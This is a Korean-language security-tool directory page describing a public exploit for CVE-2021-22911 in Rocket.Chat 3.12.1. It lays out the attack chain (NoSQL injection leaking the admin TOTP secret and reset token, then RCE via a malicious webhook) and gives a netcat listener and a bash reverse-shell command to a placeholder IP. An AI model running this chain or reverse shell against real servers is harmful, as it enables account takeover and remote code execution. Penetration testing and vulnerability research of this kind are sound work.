Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2021-22911-RocketChat — Rocket.Chat 3.12.1의 사전 인증 NoSQL 인젝션을 통한 RCE 익스플로잇으로, 관리자 TOTP 비밀번호와 비밀번호 재설정 토큰을 유출하여 악성 웹훅 통합을 통해 원격 코드 실행을 달성합니다. | Kitploit
도구/GitHubGitHub/faridi-m/cve-2021-22911-rocketchat
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationPayload Development
GitHubfaridi-m/cve-2021-22911-rocketchat

CVE-2021-22911-RocketChat

Rocket.Chat 3.12.1의 사전 인증 NoSQL 인젝션을 통한 RCE 익스플로잇으로, 관리자 TOTP 비밀번호와 비밀번호 재설정 토큰을 유출하여 악성 웹훅 통합을 통해 원격 코드 실행을 달성합니다.

저장소 보기
226개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2021-22911 — Rocket.Chat 3.12.1 RCE (즉석)

설명

Rocket.Chat 3.12.1의 사전 인증(pre-auth) NoSQL 인젝션 취약점을 악용하여 관리자의 TOTP 비밀키와 비밀번호 재설정 토큰을 유출하고, 관리자 계정을 탈취한 뒤 악성 웹훅 통합을 통해 RCE를 달성합니다.

영향받는 버전

Rocket.Chat <= 3.12.1

요구 사항

pip install -r requirements.txt

설정 - 먼저 리스너 시작하기

익스플로잇을 실행하기 전에, 별도의 터미널에서 netcat 리스너를 시작하여 들어오는 리버스 셸을 받으세요:

root@kitploit:~
nc -lvnp 4444

이 터미널을 열어 두세요. 익스플로잇이 성공적으로 실행되면 셸이 여기에 표시됩니다.

사용법

root@kitploit:~
python3 pwn_rocketchat.py \
  -t 'http://TARGET:3000' \
  -u 'USERNAME' \
  -p 'PASSWORD' \
  -e '[email protected]' \
  -a 'adminusername' \
  -c '/bin/bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'

인자

플래그설명
-t대상 Rocket.Chat URL
-u등록된 낮은 권한(low-priv) 사용자 이름
-p등록된 낮은 권한(low-priv) 비밀번호
-e관리자 이메일 주소
-a관리자 사용자 이름
-c리버스 셸 명령
-v상세(verbose) 모드 (원시 응답 표시)

작동 원리

  1. DDP 프로토콜을 통해 낮은 권한의 사용자로 인증합니다
  2. NoSQL $where 인젝션을 통해 관리자 TOTP 비밀키를 유출합니다
  3. 관리자 비밀번호 재설정 이메일을 트리거합니다
  4. NoSQL $where 인젝션을 통해 관리자 비밀번호 재설정 토큰을 유출합니다
  5. 유출된 TOTP 비밀키를 사용하여 2FA를 우회하고 관리자 비밀번호를 재설정합니다
  6. 악성 웹훅 통합을 생성하고 RCE를 트리거합니다

면책 조항

이 도구는 교육 목적 및 공인된 침투 테스트용으로만 제작되었습니다. 작성자는 이 도구의 오용 또는 이로 인해 발생한 피해에 대해 책임을 지지 않습니다. 테스트를 수행하기 전에 항상 적절한 서면 승인을 받으십시오.

참조

  • https://nvd.nist.gov/vuln/detail/CVE-2021-22911
도구 다운로드